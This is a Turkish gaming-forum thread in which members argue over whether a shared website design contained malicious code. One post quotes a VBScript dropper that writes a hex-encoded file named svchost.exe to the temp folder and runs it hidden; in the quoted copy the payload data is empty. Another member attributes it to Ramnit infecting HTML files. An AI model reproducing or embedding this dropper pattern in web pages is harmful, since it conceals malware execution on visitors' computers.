Heçkır Çoçuk GameWarrior

Altikardes

Kızıltaş Madencisi
En iyi cevaplar
0

Aklı sıra,siteye veri yazmaya çalışcak akıllı çocuk.
DropFileName = "svchost.exe"
WriteData = ""
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0

en çok bu koda güldüm Q:WER

@GameWarrior

:D tema bile CSS MENU MAKER den kodlanmış

HEÇKIR JOJUK @GameWarrior

Vienicome

Hayalet Avcısı
En iyi cevaplar
0
Böyle durumlarda uygulanacak en iyi şey*

Ve konuya gelirsek uğraşmana gerek yok böyle şeylerle forumda konu açma filan, hwid ban uzun süre işe yarar :(
Tabi değiştirmeyi bilmiyorsa*

ByAehn

Lhaewion Reveth
Süper Üye
En iyi cevaplar
0
3 Saattir Kendi PC'mde Bile Değilim Neremle Bot Atayım?

Bu Arada CSS Menu Maker O Menü Kısmı İçin.Elimde Tasarımın Hala PSD si var.
Botu Benim Attığım Yazıyormu "GameWarrior Bot Attı" diye?

Site Kullanmayı Biliyorsanız Kullanın.Kullanmayı bilmiyorsanız Yavaşca Fişi çekin.

Altikardes

Kızıltaş Madencisi
En iyi cevaplar
0
3 Saattir Kendi PC'mde Bile Değilim Neremle Bot Atayım?

Bu Arada CSS Menu Maker O Menü Kısmı İçin.Elimde Tasarımın Hala PSD si var.
Botu Benim Attığım Yazıyormu "GameWarrior Bot Attı" diye?

Site Kullanmayı Biliyorsanız Kullanın.Kullanmayı bilmiyorsanız Yavaşca Fişi çekin.
Bot diyor: D güldürdün devam et sen işine

S

Sergunkorowakurwa

Ziyaretçi
Sen de iyi trim etseydin, senin suçun. Ben shell atsayım index videosu:

ByAehn

Lhaewion Reveth
Süper Üye
En iyi cevaplar
0
Daha ingilizceniz yok ona buna bot diyorsunuz.Yatay Yada Dikey Menü Düşündüm Acaba hangi Renk Tonlarını Çizebilirim Diye.Sonra Açılabilir Menü Aklıma Geldi.İnternetten Hazır CSS Menu Buldum CSS Menu'nün Grafiklerini Kullanarakta Tasarım Yaptım.İsteyene Linki @Minecraftplayerr versin Onlara Attığım Link Virüs Falanda Taratın.Ayrıca Bu Tür Küçük Çaplı Bir Siteye Neden Bot Atayım?
1 Gün Boyunca Tasarımı Çizip Kodladım Diyemi?

bgencacat

Lapis Toplayıcısı
En iyi cevaplar
0
Yanlış alarm sanırım, bu bilgisayarındaki bir virüsten dolayı kaynaklanıyor. Adı ramnit diye geçiyordu sanırım. Senin bilgisayarındaki tüm HTML dosyalarına bulaşır bu.

Altikardes

Kızıltaş Madencisi
En iyi cevaplar
0
Yanlış alarm sanırım, bu bilgisayarındaki bir virüsten dolayı kaynaklanıyor. Adı ramnit diye geçiyordu sanırım. Senin bilgisayarındaki tüm HTML dosyalarına bulaşır bu.
Benim bilgisayarımı tarattım,böyle bir şey yok -.- Gamewarrior'da sorun var o zaman

bgencacat

Lapis Toplayıcısı
En iyi cevaplar
0
Benim bilgisayarımı tarattım,böyle bir şey yok -.- Gamewarrior'da sorun var o zaman
Hayır. Bu onun hiçbir işine yaramayacak bir shell zaten. Ayrıca bilgisayarından başka bir yerde çalışmaz. Aynı sorunu yaşadım hatta bunun için blogumda yazı yazacaktım fakat üşendim. Yani boşuna kimseyi zan altında bırakmaya gerek yok. Bilgisayarındaki diğer html dosyalarına bakarsan (virüsün ne kadar süredir bilgisayarında olduğunu bilmiyorum) en altında bu kodları görebilirsin.

ByAehn

Lhaewion Reveth
Süper Üye
En iyi cevaplar
0
Alın buda Onlara Attığım Link
Linki görebilmek için üye olmanız gerekiyor. Giriş yap veya üye ol.

Bu arada Tasarımın CSS Menu Maker ile Yapıldığını İlk Defa Bu Salaklardan Duydum A:SÇDASÇD

Alın buda Tasarımın PSD'si:
Linki görebilmek için üye olmanız gerekiyor. Giriş yap veya üye ol.
[DOUBLEPOST=1427315019,1427314934][/DOUBLEPOST]
Hayır. Bu onun hiçbir işine yaramayacak bir shell zaten. Ayrıca bilgisayarından başka bir yerde çalışmaz. Aynı sorunu yaşadım hatta bunun için blogumda yazı yazacaktım fakat üşendim. Yani boşuna kimseyi zan altında bırakmaya gerek yok. Bilgisayarındaki diğer html dosyalarına bakarsan (virüsün ne kadar süredir bilgisayarında olduğunu bilmiyorum) en altında bu kodları görebilirsin.

Boş ver Hani Köpek Amaçsızca Kuyruğunu Kovalar,Sen Ona Onun Kuyruğu olduğunu söylesende Kabullenmez ya,Bunlarda bunu kabullenmez.

İşim Gücüm yok bu Tarz Siteleremi Bot Atayım.Gider Atacaksam Mineplex veya SO'ya atarım ki Atmayıda Planlamıyorum(Atmayı bilmiyor çaktırmayın)[DOUBLEPOST=1427315125][/DOUBLEPOST]Hani Ben siteye Girdim Bi Sorun Yok?

Boşverin.Buda bana Ders Olsun.Bundan Sonra Bilmediğim abilere Tasarım Kodlamak suç.[DOUBLEPOST=1427315745][/DOUBLEPOST]Bu Arada @HighSchoolRPG ve @Minecraftplayerr Adlı Şahsiyetten Yorum Bekliyorum.